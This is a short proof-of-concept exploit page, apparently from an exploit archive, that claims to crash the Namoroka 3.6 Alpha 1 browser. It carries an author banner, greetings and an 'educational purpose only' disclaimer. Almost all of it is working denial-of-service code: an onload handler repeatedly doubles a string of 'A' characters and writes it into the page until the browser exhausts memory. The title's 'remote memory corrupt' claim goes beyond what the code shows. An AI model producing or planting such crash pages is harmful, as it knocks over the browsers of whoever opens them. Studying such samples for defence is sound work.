================================================================
Namoroka 3.6 Alpha 1 Remote Memory Corrupt (Local Crash Exploit)
================================================================
<!--
Namoroka 3.6 Alpha 1 Remote Memory Corrupt (Local Crash Exploit)
Save this script with extension .html
Then open with Namoroka web browser v.3.6 alpha 1
THIS FOR EDUCATIONAL PURPOSE ONLY
AUTHOR WILL NOT RESPONSIBLE FOR ANY DAMAGE
Tested on WINXP (sp2 - sp3) - WIN 7
Author : eidelweiss
Contact : eidelweiss[at]myself[dot]com OR g1xsystem[at]windowslive.com
Greets: [D]eal [c]yber - yogyacarderlink
-->
<body onload="javascript:DoS();"></body>
<script>
function DoS() {
var buffer = '\x41';
for (i =0;i<666;i++) {
buffer+=buffer+'\x41';
document.write('<html><marquee><h1>'+buffer+buffer);
}
}
</script>
|